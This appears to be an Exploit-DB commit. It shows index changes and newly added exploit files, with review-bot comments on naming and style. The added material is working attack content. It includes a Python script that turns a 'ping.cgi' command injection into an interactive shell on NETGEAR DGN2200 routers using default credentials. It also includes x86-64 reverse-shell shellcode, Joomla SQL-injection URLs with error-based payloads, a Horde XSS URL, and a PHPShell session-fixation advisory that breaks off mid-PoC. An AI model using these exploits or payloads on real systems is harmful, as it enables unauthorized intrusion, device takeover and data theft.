DB: 2017-02-20

14 new exploits

Linux - Reverse Shell Shellcode (66 bytes)

Joomla! Component com_Joomlaoc - 'id' SQL Injection
Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection

Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection
Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection

Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload
Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload

Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting
Horde 3.3.5 - Cross-Site Scripting
Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection
Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection
Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection
Joomla! Component OS Property 3.0.8 - SQL Injection
Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection
Joomla! Component OS Services Booking 2.5.1 - SQL Injection
Joomla! Component Room Management 1.0 - SQL Injection
Joomla! Component Bazaar Platform 3.0 - SQL Injection
Joomla! Component Google Map Store Locator 4.4 - SQL Injection
Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection
NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Sawmill Enterprise 8.7.9 - Authentication Bypass
PHPShell 2.4 - Session Fixation
Offensive Security 2017-02-20 05:01:17 +00:00
parent 2d72a9c8b9
commit ae0dd9fa7c
16 changed files with 614 additions and 5 deletions


@ -15898,6 +15898,7 @@ id,file,description,date,author,platform,type,port
41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP Alphanumeric Staged Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0
41375,platforms/linux/shellcode/41375.c,"Linux - Dual/Multi mode Bind Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0
41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0
41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -21643,7 +21644,7 @@ id,file,description,date,author,platform,type,port
9601,platforms/php/webapps/9601.php,"Joomla! Component BF Survey Pro Free - SQL Injection",2009-09-09,jdc,php,webapps,0
9602,platforms/php/webapps/9602.pl,"Joomla! Component TPDugg 1.1 - Blind SQL Injection",2009-09-09,NoGe,php,webapps,0
9603,platforms/php/webapps/9603.txt,"Model Agency Manager Pro - (user_id) SQL Injection",2009-09-09,R3d-D3V!L,php,webapps,0
9604,platforms/php/webapps/9604.txt,"Joomla! Component com_Joomlaoc - 'id' SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
9604,platforms/php/webapps/9604.txt,"Joomla! Component Joomloc 1.0 - 'id' Parameter SQL Injection",2009-09-09,"Chip d3 bi0s",php,webapps,0
9605,platforms/php/webapps/9605.pl,"Agoko CMS 0.4 - Remote Command Execution",2009-09-09,StAkeR,php,webapps,0
9609,platforms/php/webapps/9609.txt,"Mambo Component Hestar - SQL Injection",2009-09-09,M3NW5,php,webapps,0
9611,platforms/php/webapps/9611.txt,"PHPNagios 1.2.0 - 'menu.php' Local File Inclusion",2009-09-09,CoBRa_21,php,webapps,0
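Review bot: the rewritten 9604 row introduces a version, `Joomloc 1.0`, that the old description (`com_Joomlaoc - 'id' SQL Injection`) never carried; unless 9604.txt itself states 1.0, the version should be left out rather than guessed. The `'id' Parameter SQL Injection` wording is the right normalization, but the other two renamed rows in this commit (12113 and 19829) do not receive the same treatment, so the naming convention is still applied piecemeal.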
@ -22939,7 +22940,7 @@ id,file,description,date,author,platform,type,port
12108,platforms/php/webapps/12108.txt,"Joomla! Component com_articles - SQL Injection",2010-04-08,"pratul agrawal",php,webapps,0
12111,platforms/php/webapps/12111.txt,"Joomla! Component 'com_webeecomment' 2.0 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
12112,platforms/php/webapps/12112.txt,"Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion",2010-04-08,AntiSecurity,php,webapps,0
12113,platforms/php/webapps/12113.txt,"Joomla! Component com_awdwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
12113,platforms/php/webapps/12113.txt,"Joomla! Component AWDwall 1.5.4 - Local File Inclusion / SQL Injection",2010-04-08,AntiSecurity,php,webapps,0
12115,platforms/php/webapps/12115.txt,"Kubeit CMS - SQL Injection",2010-04-08,Phenom,php,webapps,0
12118,platforms/php/webapps/12118.txt,"Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion",2010-04-09,AntiSecurity,php,webapps,0
12120,platforms/php/webapps/12120.txt,"Joomla! Component Foobla Suggestions 1.5.1.2 - Local File Inclusion",2010-04-09,"Chip d3 bi0s",php,webapps,0
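Review bot: 12113 moves from the component slug `com_awdwall` to the product name AWDwall, while the neighbouring rows 12108 (`com_articles`) and 12111 (`'com_webeecomment'`) keep the slug form, and the new 41385 row added further down calls the very same `com_awdwall` component "JomWALL" (its Google Dork is `inurl:index.php?option=com_awdwall`). Pick one product name per component so a search for either entry finds the other, e.g. `Joomla! Component JomWALL (AWDwall) 1.5.4 - ...`.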
@ -25626,7 +25627,7 @@ id,file,description,date,author,platform,type,port
19792,platforms/php/webapps/19792.txt,"Joomla! Component 'com_ksadvertiser' - Remote File / Bypass Upload",2012-07-13,D4NB4R,php,webapps,0
19825,platforms/php/webapps/19825.php,"Shopware 3.5 - SQL Injection",2012-07-14,Kataklysmos,php,webapps,0
19964,platforms/php/webapps/19964.txt,"PHP-Nuke module (SPChat) - SQL Injection",2012-07-20,"Yakir Wizman",php,webapps,0
19829,platforms/php/webapps/19829.txt,"Joomla! Component 'com_osproperty' 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
19829,platforms/php/webapps/19829.txt,"Joomla! Component com_osproperty 2.0.2 - Unrestricted Arbitrary File Upload",2012-07-14,D4NB4R,php,webapps,0
19859,platforms/hardware/webapps/19859.txt,"Vivotek Cameras - Sensitive Information Disclosure",2012-07-16,GothicX,hardware,webapps,0
19862,platforms/php/webapps/19862.pl,"WordPress Theme Diary/Notebook Site5 - Email Spoofing",2012-07-16,bwall,php,webapps,0
19863,platforms/php/webapps/19863.txt,"CakePHP 2.x < 2.2.0-RC2 - XXE Injection",2012-07-16,"Pawel Wylecial",php,webapps,0
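Review bot: 19829 only loses the quotes around `com_osproperty`, yet the 41386 row added below names the same component "OS Property" (its dork is `option=com_osproperty`); one of the two should match the other, e.g. `Joomla! Component OS Property 2.0.2 - Unrestricted Arbitrary File Upload`, so the two findings against the same component sort together.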
@ -27494,7 +27495,7 @@ id,file,description,date,author,platform,type,port
25302,platforms/php/webapps/25302.txt,"PHPCOIN 1.2 - auxpage.php page Parameter Traversal Arbitrary File Access",2005-03-29,"James Bercegay",php,webapps,0
25304,platforms/php/webapps/25304.py,"MoinMoin - Arbitrary Command Execution",2013-05-08,HTP,php,webapps,0
25305,platforms/multiple/webapps/25305.py,"ColdFusion 9-10 - Credential Disclosure",2013-05-08,HTP,multiple,webapps,0
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Administration Interface admin/PHPshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
33406,platforms/php/webapps/33406.txt,"Horde 3.3.5 - Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
33407,platforms/php/webapps/33407.txt,"Horde 3.3.5 - Administration Interface admin/cmdshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
33408,platforms/php/webapps/33408.txt,"Horde 3.3.5 - Administration Interface admin/sqlshell.php PATH_INFO Parameter Cross-Site Scripting",2009-12-15,"Juan Galiana Lara",php,webapps,0
25308,platforms/php/webapps/25308.txt,"PhotoPost Pro 5.1 - showgallery.php Multiple Parameter Cross-Site Scripting",2005-03-28,"Diabolic Crab",php,webapps,0
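Review bot: shortening 33406 to `Horde 3.3.5 - Cross-Site Scripting` drops the `admin/PHPshell.php PATH_INFO` detail that distinguished it from the untouched 33407 (admin/cmdshell.php) and 33408 (admin/sqlshell.php) rows on the next two lines, leaving three entries for the same product and date where only one is now ambiguous. Either shorten all three the same way, e.g. `Horde 3.3.5 - 'admin/phpshell.php' PATH_INFO Cross-Site Scripting`, or leave 33406 as it was.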
@ -37300,3 +37301,16 @@ id,file,description,date,author,platform,type,port
41379,platforms/php/webapps/41379.txt,"Joomla! Component Team Display 1.2.1 - 'filter_category' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
41380,platforms/php/webapps/41380.txt,"Joomla! Component Groovy Gallery 1.0.0 - SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
41382,platforms/php/webapps/41382.txt,"Joomla! Component WMT Content Timeline 1.0 - 'id' Parameter SQL Injection",2017-02-17,"Ihsan Sencan",php,webapps,0
41383,platforms/php/webapps/41383.txt,"Joomla! Component Joomloc-CAT 4.1.3 - 'ville' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41384,platforms/php/webapps/41384.txt,"Joomla! Component Joomloc-Lite 1.3.2 - 'site_id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41385,platforms/php/webapps/41385.txt,"Joomla! Component JomWALL 4.0 - 'wuid' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41386,platforms/php/webapps/41386.txt,"Joomla! Component OS Property 3.0.8 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41387,platforms/php/webapps/41387.txt,"Joomla! Component EShop 2.5.1 - 'id' Parameter SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41388,platforms/php/webapps/41388.txt,"Joomla! Component OS Services Booking 2.5.1 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41389,platforms/php/webapps/41389.txt,"Joomla! Component Room Management 1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41390,platforms/php/webapps/41390.txt,"Joomla! Component Bazaar Platform 3.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41391,platforms/php/webapps/41391.txt,"Joomla! Component Google Map Store Locator 4.4 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41393,platforms/php/webapps/41393.txt,"Joomla! Component Most Wanted Real Estate 1.1.0 - SQL Injection",2017-02-18,"Ihsan Sencan",php,webapps,0
41394,platforms/hardware/webapps/41394.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution",2017-02-18,SivertPL,hardware,webapps,0
41395,platforms/windows/webapps/41395.txt,"Sawmill Enterprise 8.7.9 - Authentication Bypass",2017-02-18,hyp3rlinx,windows,webapps,0
41396,platforms/php/webapps/41396.txt,"PHPShell 2.4 - Session Fixation",2017-02-19,hyp3rlinx,php,webapps,0
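Review bot: the id sequence in this block skips 41392 (41391 is followed by 41393) and 41397 (41396, then 41398 in the first hunk); if those are withheld submissions that is fine, but worth confirming. Parameter naming is inconsistent within the block: 41383, 41384, 41385 and 41387 name the injected parameter, while 41386, 41388, 41389, 41390, 41391 and 41393 do not, even though the added files do (`catIds[0]` for 41386, `vid`/`category_id`/`employee_id` for 41388, `date`/`status`/`id` for 41389). The 41396 row is dated 2017-02-19, but the PHPShell advisory's own Disclosure Timeline says "February 18, 2017 : Public Disclosure".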



@ -0,0 +1,58 @@
#!/usr/bin/python
#Provides access to default user account, privileges can be easily elevated by using either:
# - a kernel exploit (ex. memodipper was tested and it worked)
# - by executing /bin/bd (suid backdoor present on SOME but not all versions)
# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon along with the 2nd vuln)
#Pozdrawiam: Kornela, Komara i Sknerusa
import sys
import requests
#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions
#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to
login = 'admin'
password = 'password'
def main():
if len(sys.argv) < 2 or len(sys.argv) == 3:
print "./netgearpwn.py <router ip>"
return
spawnShell()
def execute(cmd):
r = requests.post("http://" + sys.argv[1] + "/ping.cgi", data={'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping':"Ping", 'ping_IPAddr':"12.12.12.12; " + cmd}, auth=(login, password), headers={'referer': "http://192.168.0.1/DIAG_diag.htm"})
result = parseOutput(r.text)
return result
def spawnShell():
r = execute("echo pwn3d")
if any("pwn3d" in s for s in r) == False:
print "Something went wrong, is the system vulnerable? Are the credentials correct?"
return
while True:
cmd = raw_input("$ ")
r = execute(cmd)
for l in r:
print l.encode("utf-8")
def parseOutput(output):
yet = False
a = False
result = []
for line in output.splitlines():
if line.startswith("<textarea"):
yet = True
continue
if yet == True:
if line.startswith("</textarea>"):
break
result.append(line)
return result
if __name__ == "__main__":
main()
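Review bot: the argument check at the top of main() is wrong: `if len(sys.argv) < 2 or len(sys.argv) == 3:` rejects exactly three arguments but accepts four or more; `if len(sys.argv) != 2:` expresses the intent. The script is Python 2 only (`print` statements, `raw_input`) while the shebang is the unversioned `#!/usr/bin/python`; `a = False` in parseOutput is unused; `if any(...) == False:` and `if yet == True:` read better as `if not any(...)` and `if yet:`. The file also lacks the Exploit Title / Date / Vendor / Version / CVE header that every other file in this commit carries, and the header comment's promise that a "separate advisory will be released soon along with the 2nd vuln" does not belong in an archived file; replace it with the EDB-ID once that advisory exists.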


@ -0,0 +1,71 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/02/assignment-2b.html
global _start
section .text
_start:
; Socket
push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq
syscall
; Connect
xchg edi, eax
push rdx
mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002
not rbx
push rbx
mov al, 42
push rsp
pop rsi
mov dl, 16
syscall
; Dup 2
push 3
pop rsi
dup2loop:
mov al, 33
dec esi
syscall
loopnz dup2loop
; Execve
; rax and rsi are zero from the result of the last dup2 syscall and loop
push rax ; zero terminator for the following string that we are pushing
mov rbx, '/bin//sh'
push rbx
; store /bin//sh address in RDI
push rsp
pop rdi
cdq ; zero rdx
mov al, 59
syscall
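Review bot: neither the files.csv description (`Linux - Reverse Shell Shellcode (66 bytes)`) nor the file header states the architecture, but the code is x86-64 (rax/rdi/rsi, `syscall`); name it the way the 41282 row does (`Linux/x86 - ...`). The line `mov rbx, 0xfeffff80a3eefffd ; not encoded 0x0100007f5c110002` should say what the constant is (the sockaddr_in for AF_INET, port 0x115c and 127.0.0.1, stored NOT-encoded so the pushed value contains no null bytes) instead of leaving readers to decode it. The `mov al, 42`, `mov al, 33` and `mov al, 59` sequences rely on the upper bits of rax being zero from the previous syscall's return value, and `push rax ; zero terminator` relies on the last dup2 returning 0, so the code assumes every call succeeds; a one-line header note would spare readers from rediscovering that. The curly quotes in the license text (“Software”, “as is”) are non-ASCII bytes in an assembler source; plain ASCII quotes avoid encoding surprises.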


@ -8,4 +8,4 @@ This issue affects versions prior to Horde 3.3.6.
Note that additional products that use the Horde framework may also be vulnerable.
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=&lt;sessid&gt;
http://www.example.com/horde-3.3.5/admin/phpshell.php/%22%3E%3Cscript%3Ealert%288%29;%3C/script%3E%3Cform%20/?Horde=<sessid>

platforms/php/webapps/41383.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component Joomloc-CAT v4.1.3 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-cat/
# Demo: http://www.joomloc.fr.nf/joomlocprocmpms/
# Version: 4.1.3
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=engine&layout=geo&liste=65&place=dep&ville=[SQL]
# # # # #
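Review bot: the file is a header plus a single URL template; it does not say which script or query in the component builds the statement from `ville`, shows no vulnerable code excerpt, and has no vendor notification, disclosure timeline or CVE reference. The same header-only format is used for all ten Ihsan Sencan files in this commit (41383 to 41393), so the remarks apply to each. The Google Dork `inurl:index.php?option=com_joomloc` is identical to the one in 41384 (Joomloc-Lite), so the field does not identify this product and could be dropped rather than duplicated. `Software Buy` points at the JED listing rather than a vendor purchase page.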

platforms/php/webapps/41384.txt Executable file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Joomla! Component Joomloc-Lite v1.3.2 - SQL Injection
# Google Dork: inurl:index.php?option=com_joomloc
# Date: 18.02.2017
# Vendor Homepage: http://www.joomloc.fr.nf/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/joomloc-lite/
# Demo: http://www.joomloc.fr.nf/joomloclite/
# Version: 1.3.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_joomloc&view=loc&layout=singleloc&site_id=[SQL]
# # # # #

platforms/php/webapps/41385.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component JomWALL v4.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_awdwall
# Date: 18.02.2017
# Vendor Homepage: http://dashbite.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/jomwall/
# Demo: http://demo-dashbite.com/
# Version: 4.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_awdwall&task=gethovercard&wuid=[SQL]
# # # # #

platforms/php/webapps/41386.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component OS Property v3.0.8 - SQL Injection
# Google Dork: inurl:index.php?option=com_osproperty
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/os-property-joomla-real-estate.html
# Demo: http://osproperty.ext4joomla.com/
# Version: 3.0.8
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osproperty&view=ltype&catIds[0]=[SQL]
# # # # #
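Review bot: the injectable parameter here is an array element, `catIds[0]`, which the files.csv title (`Joomla! Component OS Property 3.0.8 - SQL Injection`) does not mention; add a `'catIds' Parameter` qualifier as 41383 to 41385 have. Worth a cross-reference line too: 19829 in this archive covers release 2.0.2 of the same component under the slug `com_osproperty`, and the vendor page in this header (joomdonation.com) is the place a fixed version would be announced, which the file does not state.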

platforms/php/webapps/41387.txt Executable file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Joomla! Component EShop v2.5.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_eshop
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/eshop-joomla-shopping-cart.html
# Demo: http://joomdonationdemo.com/eshop
# Version: 2.5.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_eshop&view=category&id=[SQL]
# # # # #

platforms/php/webapps/41388.txt Executable file

@ -0,0 +1,21 @@
# # # # #
# Exploit Title: Joomla! Component OS Services Booking v2.5.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_osservicesbooking
# Date: 18.02.2017
# Vendor Homepage: https://www.joomdonation.com/
# Software Buy: https://www.joomdonation.com/joomla-extensions/joomla-services-appointment-booking.html
# Demo: http://osb.ext4joomla.com/
# Version: 2.5.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&task=default_showmap&vid=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_osservicesbooking&view=default&category_id=15&employee_id=&vid=[SQL]
# Etc..
# # # # #
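Review bot: `# Etc..` at the end of the URL list is not a finding; list every parameter that was actually confirmed and drop the open-ended line (the same `Etc...` closer appears in 41389, 41390, 41391 and 41393). Of the four URLs shown, the third and fourth differ only in `employee_id=[SQL]` versus `employee_id=&vid=[SQL]`, and `vid` is already covered by the first URL (`task=default_showmap&vid=[SQL]`), so the file documents three parameters (`vid`, `category_id`, `employee_id`), not four; the files.csv title names none of them.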

platforms/php/webapps/41389.txt Executable file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Joomla! Component Room Management v1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_roommgmt
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/room-management/live-demo
# Demo: http://matamko.com/products/room-management/live-demo
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/room/book?tmpl=component&id=5&date=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=[SQL]
# '+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/my-bookings?task=booking.cancelBooking&status=0&id=[SQL]
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #
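Review bot: unlike the other files in this batch, this one pastes a full error-based payload (`extractvalue(...)`) under each URL; the three lines are near-identical copies, so a single "same payload for each" note would be clearer, and the hex string `0x496873616e2053656e63616e` is just the author's name, which should be said. `Software Buy` and `Demo` are the same URL (`http://matamko.com/products/room-management/live-demo`), so one of the two fields is wrong. The URLs are SEF paths (`/room/book`, `/my-bookings`) with no `option=` value, so the `com_roommgmt` in the dork is not visible anywhere in the shown requests; say where it comes from.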

platforms/php/webapps/41390.txt Executable file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Joomla! Component Bazaar Platform v3.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_bazaar
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/bazaar/live-demo
# Demo: http://matamko.com/products/bazaar/live-demo
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=a&category=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=productsearch&searchproduct=[SQL]
# 1'+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# http://localhost/[PATH]/index.php?option=com_bazaar&view=product&productid=[SQL]
# 1+/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #

platforms/php/webapps/41391.txt Executable file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Joomla! Component Google Map Store Locator v4.4 - SQL Injection
# Google Dork: inurl:index.php?option=com_googlemaplocator
# Date: 18.02.2017
# Vendor Homepage: http://matamko.com/
# Software Buy: http://matamko.com/products/google-map-store-locator/live-demo
# Demo: http://gtlocator4.demo.matamko.com/
# Version: 4.4
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?filter_to=a&filter_day=21-02-2017&filter_time=[SQL]
# +/*!50000Procedure*/+/*!50000Analyse*/+(extractvalue(0,/*!50000concat*/(0x27,0x496873616e2053656e63616e,0x3a,@@version)),0)-- -
# Etc...
# # # # #

platforms/php/webapps/41393.txt Executable file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Joomla! Component Most Wanted Real Estate v1.1.0 - SQL Injection
# Google Dork: inurl:index.php?option=com_mostwantedrealestate
# Date: 18.02.2017
# Vendor Homepage: http://mostwantedrealestatesites.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/most-wanted-real-estate/
# Demo: http://demo.mostwantedrealestatesites.com/
# Version: 1.1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=&filter_a1minland=&filter_a1maxland=&filter_a1landtype=0&which_order=[SQL]
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=&filter_a1maxarea=[SQL]
# http://localhost/[PATH]/?filter_a1search=Ihsan_Sencan&filter_a1type=0&filter_a1minprice=&filter_a1maxprice=&filter_a1locality=0&filter_a1minbed=0&filter_a1minbaths=&filter_a1minarea=[SQL]
# Etc...
# # # # #

platforms/php/webapps/41396.txt Executable file

@ -0,0 +1,136 @@
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-SESSION-FIXATION.txt
[+] ISR: ApparitionSec
Vendor:
==================================
sourceforge.net/projects/phpshell/
phpshell.sourceforge.net/
Product:
==============
PHPShell v2.4
Vulnerability Type:
===================
Session Fixation
CVE Reference:
==============
N/A
Security Issue:
================
PHPShell does not regenerate the Session ID upon authentication, this can
potentially allow remote attackers to access parts of the application
using only a valid PHPSESSID if PHP.INI setting for
session.use_only_cookies=0.
Since an existing XSS vulnerability exists in PHPShell "
http://hyp3rlinx.altervista.org/advisories/PHPSHELL-v2.4-CROSS-SITE-SCRIPTING.txt"
the risk is
increased if an authenticated user clicks an attacker supplied link and the
attacker finds way to access or set the victims Cookie.
In 'phpshell.php' line 153 we see call to PHP function session_start();
After user authentication no call to "session_regenerate_id()" is made
leaving the authenticated session id same as pre-auth session id.
However, "session.use_only_cookies=1" is default since PHP 4.3.0, so to
exploit it would require that PHP.INI is set to session.use_only_cookies=0
on the victims system.
When accessing the application using the session fixation flaw and
attempting to run system command the application luckily redirects to login
form.
However, if a victim is actively changing directorys, reading files etc...
attackers may still be able to read current directory and files open
in the victims PHPShell console window.
Exploit/POC:
=============
1) Login to PHPShell run commands to CD to Windows directory and run DIR
command etc, then find and copy the PHPSESSID Cookie
2) Open a second browser (InternetExplorer) and access the application
cleanly for first time using the PHPSESSID in URL.
e.g.
